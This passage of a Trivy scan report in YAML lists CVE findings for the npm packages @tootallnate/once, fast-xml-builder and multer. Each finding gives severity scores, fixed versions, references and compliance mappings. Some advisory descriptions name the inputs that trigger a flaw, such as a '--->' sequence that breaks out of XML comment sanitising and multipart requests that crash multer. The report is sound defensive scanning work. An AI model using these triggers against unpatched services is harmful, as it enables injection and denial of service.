|
|
or degraded application availability.
|
|
Severity: LOW
|
|
CweIDs: *id008
|
|
VendorSeverity:
|
|
ghsa: 1
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
|
|
V40Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
|
|
V3Score: 3.3
|
|
V40Score: 1.9
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 4
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-3449
|
|
- https://github.com/TooTallNate/once
|
|
- https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
|
|
- https://github.com/TooTallNate/once/issues/8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-3449
|
|
- https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-3449
|
|
PublishedDate: '2026-03-03T05:17:25.017Z'
|
|
LastModifiedDate: '2026-05-19T15:38:48.397Z'
|
|
context:
|
|
sbom:
|
|
name: '@tootallnate/once'
|
|
version: 2.0.0
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: &id010
|
|
- control: '7.1'
|
|
title: Establish and Maintain a Vulnerability Management Process
|
|
implementationGroup: IG1
|
|
- control: '7.2'
|
|
title: Establish and Maintain a Remediation Process
|
|
implementationGroup: IG1
|
|
- control: '7.3'
|
|
title: Perform Automated Operating System Patch Management
|
|
implementationGroup: IG1
|
|
- control: '7.4'
|
|
title: Perform Automated Application Patch Management
|
|
implementationGroup: IG2
|
|
- control: '16.11'
|
|
title: Leverage Vetted Modules or Services for Application Security Components
|
|
implementationGroup: IG2
|
|
nistCsf2_0:
|
|
- &id011
|
|
function: IDENTIFY
|
|
category: ID.RA
|
|
subcategory: ID.RA-1
|
|
description: Asset vulnerabilities are identified and documented
|
|
- &id012
|
|
function: GOVERN
|
|
category: GV.SC
|
|
subcategory: GV.SC-3
|
|
description: Cybersecurity supply chain risk management processes are identified,
|
|
established, assessed, managed, and agreed upon by organizational stakeholders
|
|
pciDss4_0:
|
|
- &id013
|
|
requirement: 6.3.3
|
|
description: Security vulnerabilities are identified and managed
|
|
priority: CRITICAL
|
|
- &id014
|
|
requirement: 11.3.1
|
|
description: Internal vulnerability scans are performed
|
|
priority: HIGH
|
|
mitreAttack:
|
|
- &id015
|
|
tactic: Initial Access
|
|
technique: T1195
|
|
techniqueName: Supply Chain Compromise
|
|
subtechnique: T1195.001
|
|
subtechniqueName: Compromise Software Dependencies and Development Tools
|
|
priority:
|
|
priority: 6.671466666666666
|
|
epss: 0.00018
|
|
epss_percentile: 0.04653
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 2
|
|
epss_multiplier: 1.00072
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3bc7bf0933f4ab4f
|
|
ruleId: CVE-2026-44665
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information
|
|
disclosure or content manipulation'
|
|
title: CVE-2026-44665
|
|
description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input
|
|
data has quotes in attribute values but process entities is not enabled, it breaks
|
|
the attribute value into multiple attributes. This gives the room for an attacker
|
|
to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in
|
|
1.1.7.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44665
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:fast-xml-builder@1.1.5
|
|
risk:
|
|
cwe: &id009
|
|
- CWE-91
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44665
|
|
VendorIDs:
|
|
- GHSA-5wm8-gmm8-39j9
|
|
PkgID: fast-xml-builder@1.1.5
|
|
PkgName: fast-xml-builder
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/fast-xml-builder@1.1.5
|
|
UID: e589910a79395ad7
|
|
InstalledVersion: 1.1.5
|
|
FixedVersion: 1.1.7
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44665
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763
|
|
Title: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information
|
|
disclosure or content manipulation'
|
|
Description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input
|
|
data has quotes in attribute values but process entities is not enabled, it
|
|
breaks the attribute value into multiple attributes. This gives the room for
|
|
an attacker to insert unwanted attributes to the XML/HTML. This vulnerability
|
|
is fixed in 1.1.7.
|
|
Severity: HIGH
|
|
CweIDs: *id009
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
|
|
V3Score: 6.1
|
|
V40Score: 8.7
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-44665
|
|
- https://github.com/NaturalIntelligence/fast-xml-builder
|
|
- https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44665
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-44665
|
|
PublishedDate: '2026-05-13T16:16:59.093Z'
|
|
LastModifiedDate: '2026-05-18T16:16:31.7Z'
|
|
context:
|
|
sbom:
|
|
name: fast-xml-builder
|
|
version: 1.1.5
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.362266666666663
|
|
epss: 0.00031
|
|
epss_percentile: 0.09168
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00124
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 291094d0af7c4e5d
|
|
ruleId: CVE-2026-44664
|
|
severity: MEDIUM
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient
|
|
sanitization of XML comments'
|
|
title: CVE-2026-44664
|
|
description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650
|
|
in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g,
|
|
'- -'). This skip the values containing three consecutive dashes (e.g., --->...),
|
|
allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML
|
|
content. This vulnerability is fixed in 1.1.6.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-44664
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:fast-xml-builder@1.1.5
|
|
risk:
|
|
cwe: &id016
|
|
- CWE-91
|
|
raw:
|
|
VulnerabilityID: CVE-2026-44664
|
|
VendorIDs:
|
|
- GHSA-45c6-75p6-83cc
|
|
PkgID: fast-xml-builder@1.1.5
|
|
PkgName: fast-xml-builder
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/fast-xml-builder@1.1.5
|
|
UID: e589910a79395ad7
|
|
InstalledVersion: 1.1.5
|
|
FixedVersion: 1.1.6
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44664
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80
|
|
Title: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient
|
|
sanitization of XML comments'
|
|
Description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650
|
|
in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g,
|
|
'- -'). This skip the values containing three consecutive dashes (e.g., --->...),
|
|
allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML
|
|
content. This vulnerability is fixed in 1.1.6.
|
|
Severity: MEDIUM
|
|
CweIDs: *id016
|
|
VendorSeverity:
|
|
ghsa: 2
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
V3Score: 6.1
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-44664
|
|
- https://github.com/NaturalIntelligence/fast-xml-builder
|
|
- https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc
|
|
- https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-44664
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-44664
|
|
PublishedDate: '2026-05-13T16:16:58.937Z'
|
|
LastModifiedDate: '2026-05-13T16:58:09.717Z'
|
|
context:
|
|
sbom:
|
|
name: fast-xml-builder
|
|
version: 1.1.5
|
|
path: /package-lock.json
|
|
compliance:
|
|
owaspTop10_2021:
|
|
- A03:2021
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 13.349866666666665
|
|
epss: 0.00031
|
|
epss_percentile: 0.09168
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 4
|
|
epss_multiplier: 1.00124
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 56ac1677596b7698
|
|
ruleId: CVE-2025-47935
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Multer vulnerable to Denial of Service via memory leaks from unclosed streams
|
|
title: CVE-2025-47935
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak
|
|
issue due to improper stream handling. When the HTTP request stream emits an error,
|
|
the internal `busboy` stream is not closed, violating Node.js stream safety guidance.
|
|
This leads to unclosed streams accumulating over time, consuming memory and file
|
|
descriptors. Under sustained or repeated failure conditions, this can result in
|
|
denial of service, requiring manual server restarts to recover. All users of Multer
|
|
handling file uploads are potentially impacted. Users should upgrade to 2.0.0
|
|
to receive a patch. No known workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-47935
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id017
|
|
- CWE-401
|
|
raw:
|
|
VulnerabilityID: CVE-2025-47935
|
|
VendorIDs:
|
|
- GHSA-44fp-w29j-9vj5
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.0.0
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47935
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b
|
|
Title: Multer vulnerable to Denial of Service via memory leaks from unclosed streams
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak
|
|
issue due to improper stream handling. When the HTTP request stream emits an
|
|
error, the internal `busboy` stream is not closed, violating Node.js stream
|
|
safety guidance. This leads to unclosed streams accumulating over time, consuming
|
|
memory and file descriptors. Under sustained or repeated failure conditions,
|
|
this can result in denial of service, requiring manual server restarts to recover.
|
|
All users of Multer handling file uploads are potentially impacted. Users should
|
|
upgrade to 2.0.0 to receive a patch. No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id017
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
|
|
- https://github.com/expressjs/multer/pull/1120
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-47935
|
|
PublishedDate: '2025-05-19T20:15:25.863Z'
|
|
LastModifiedDate: '2026-04-15T00:35:42.02Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.498533333333334
|
|
epss: 0.00177
|
|
epss_percentile: 0.38785
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00708
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9a2891a28bad4ab6
|
|
ruleId: CVE-2025-47944
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: Multer vulnerable to Denial of Service from maliciously crafted requests
|
|
title: CVE-2025-47944
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
|
|
2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed
|
|
multi-part upload request. This request causes an unhandled exception, leading
|
|
to a crash of the process. Users should upgrade to version 2.0.0 to receive a
|
|
patch. No known workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-47944
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id018
|
|
- CWE-248
|
|
raw:
|
|
VulnerabilityID: CVE-2025-47944
|
|
VendorIDs:
|
|
- GHSA-4pg4-qvpc-4q3h
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.0.0
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47944
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598
|
|
Title: Multer vulnerable to Denial of Service from maliciously crafted requests
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
|
|
version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending
|
|
a malformed multi-part upload request. This request causes an unhandled exception,
|
|
leading to a crash of the process. Users should upgrade to version 2.0.0 to
|
|
receive a patch. No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id018
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
|
|
- https://github.com/expressjs/multer/issues/1176
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-47944
|
|
PublishedDate: '2025-05-19T20:15:26.007Z'
|
|
LastModifiedDate: '2026-04-15T00:35:42.02Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.371600000000004
|
|
epss: 0.00041
|
|
epss_percentile: 0.12343
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00164
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d58f5341093c2113
|
|
ruleId: CVE-2025-48997
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'multer: Multer vulnerable to Denial of Service via unhandled exception'
|
|
title: CVE-2025-48997
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
|
|
2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload
|
|
file request with an empty string field name. This request causes an unhandled
|
|
exception, leading to a crash of the process. Users should upgrade to `2.0.1`
|
|
to receive a patch. No known workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-48997
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id019
|
|
- CWE-248
|
|
raw:
|
|
VulnerabilityID: CVE-2025-48997
|
|
VendorIDs:
|
|
- GHSA-g5hg-p3ph-g8qg
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.0.1
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48997
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac
|
|
Title: 'multer: Multer vulnerable to Denial of Service via unhandled exception'
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
|
|
version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending
|
|
an upload file request with an empty string field name. This request causes
|
|
an unhandled exception, leading to a crash of the process. Users should upgrade
|
|
to `2.0.1` to receive a patch. No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id019
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
|
|
V40Score: 8.7
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-48997
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
|
|
- https://github.com/expressjs/multer/issues/1233
|
|
- https://github.com/expressjs/multer/pull/1256
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-48997
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-48997
|
|
PublishedDate: '2025-06-03T19:15:39.577Z'
|
|
LastModifiedDate: '2026-04-15T00:35:42.02Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.565733333333334
|
|
epss: 0.00249
|
|
epss_percentile: 0.48135
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00996
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 87e4175cbe5a176c
|
|
ruleId: CVE-2025-7338
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'multer: Multer Denial of Service'
|
|
title: CVE-2025-7338
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
|
|
2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed
|
|
multi-part upload request. This request causes an unhandled exception, leading
|
|
to a crash of the process. Users should upgrade to version 2.0.2 to receive a
|
|
patch. No known workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2025-7338
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id020
|
|
- CWE-248
|
|
raw:
|
|
VulnerabilityID: CVE-2025-7338
|
|
VendorIDs:
|
|
- GHSA-fjgf-rc76-4x9p
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.0.2
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-7338
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782
|
|
Title: 'multer: Multer Denial of Service'
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
|
|
version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending
|
|
a malformed multi-part upload request. This request causes an unhandled exception,
|
|
leading to a crash of the process. Users should upgrade to version 2.0.2 to
|
|
receive a patch. No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id020
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
redhat: 2
|
|
CVSS:
|
|
ghsa:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
|
|
V3Score: 5.3
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2025-7338
|
|
- https://cna.openjsf.org/security-advisories.html
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2025-7338
|
|
- https://www.cve.org/CVERecord?id=CVE-2025-7338
|
|
PublishedDate: '2025-07-17T16:15:35.227Z'
|
|
LastModifiedDate: '2026-04-15T00:35:42.02Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
version: 1.4.5-lts.2
|
|
path: /package-lock.json
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 23.371600000000004
|
|
epss: 0.00041
|
|
epss_percentile: 0.12343
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 7
|
|
epss_multiplier: 1.00164
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2affafc067aeae6e
|
|
ruleId: CVE-2026-2359
|
|
severity: HIGH
|
|
tool:
|
|
name: trivy
|
|
version: unknown
|
|
location:
|
|
path: package-lock.json
|
|
startLine: 0
|
|
message: 'multer: Multer: Denial of Service via dropped file upload connections'
|
|
title: CVE-2026-2359
|
|
description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
|
|
a Denial of Service (DoS) by dropping connection during file upload, potentially
|
|
causing resource exhaustion. Users should upgrade to version 2.1.0 to receive
|
|
a patch. No known workarounds are available.
|
|
remediation: https://avd.aquasec.com/nvd/cve-2026-2359
|
|
references: []
|
|
tags:
|
|
- vulnerability
|
|
- pkg:multer@1.4.5-lts.2
|
|
risk:
|
|
cwe: &id021
|
|
- CWE-772
|
|
raw:
|
|
VulnerabilityID: CVE-2026-2359
|
|
VendorIDs:
|
|
- GHSA-v52c-386h-88mc
|
|
PkgID: multer@1.4.5-lts.2
|
|
PkgName: multer
|
|
PkgIdentifier:
|
|
PURL: pkg:npm/multer@1.4.5-lts.2
|
|
UID: 99f2d2a7a48c940f
|
|
InstalledVersion: 1.4.5-lts.2
|
|
FixedVersion: 2.1.0
|
|
Status: fixed
|
|
SeveritySource: ghsa
|
|
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-2359
|
|
DataSource:
|
|
ID: ghsa
|
|
Name: GitHub Security Advisory npm
|
|
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
|
|
Fingerprint: sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd
|
|
Title: 'multer: Multer: Denial of Service via dropped file upload connections'
|
|
Description: Multer is a node.js middleware for handling `multipart/form-data`.
|
|
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
|
|
a Denial of Service (DoS) by dropping connection during file upload, potentially
|
|
causing resource exhaustion. Users should upgrade to version 2.1.0 to receive
|
|
a patch. No known workarounds are available.
|
|
Severity: HIGH
|
|
CweIDs: *id021
|
|
VendorSeverity:
|
|
ghsa: 3
|
|
nvd: 3
|
|
redhat: 3
|
|
CVSS:
|
|
ghsa:
|
|
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
|
|
V40Score: 8.7
|
|
nvd:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
redhat:
|
|
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
|
V3Score: 7.5
|
|
References:
|
|
- https://access.redhat.com/security/cve/CVE-2026-2359
|
|
- https://cna.openjsf.org/security-advisories.html
|
|
- https://github.com/expressjs/multer
|
|
- https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab
|
|
- https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2026-2359
|
|
- https://www.cve.org/CVERecord?id=CVE-2026-2359
|
|
PublishedDate: '2026-02-27T16:16:25.467Z'
|
|
LastModifiedDate: '2026-03-19T17:28:16.05Z'
|
|
context:
|
|
sbom:
|
|
name: multer
|
|
